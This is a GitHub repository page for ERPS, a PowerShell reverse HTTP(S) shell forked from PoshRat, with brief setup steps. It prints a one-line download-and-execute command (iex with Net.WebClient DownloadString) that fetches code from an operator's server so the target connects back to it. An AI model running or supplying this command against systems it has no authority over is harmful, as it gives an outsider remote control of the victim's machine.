Skip to content
/ ERPS Public
forked from tecrj/PoshRat-1

Endpoint Remote/Reverse Powershell

Notifications You must be signed in to change notification settings

ukozi/ERPS

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

63 Commits
 
 
 
 
 
 

Repository files navigation

Endpoint Remote/Reverse PowerShell (ERPS)

PowerShell Reverse HTTP(s) Shell

  1. Invoke ERPS_console.ps1 on a server you control. (Note: Requires Admin rights to listen on ports.)

  2. Use the Elevate console to send the ERPS Connect script package to the target. The script package will execute the code below and connect back to the analyst machine.

   iex (New-Object Net.WebClient).DownloadString("https://server/connect")

Based on PoshRat By Casey Smith @subTee, updated by/forked from ru-faraon

About

Endpoint Remote/Reverse Powershell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 98.0%
  • Batchfile 2.0%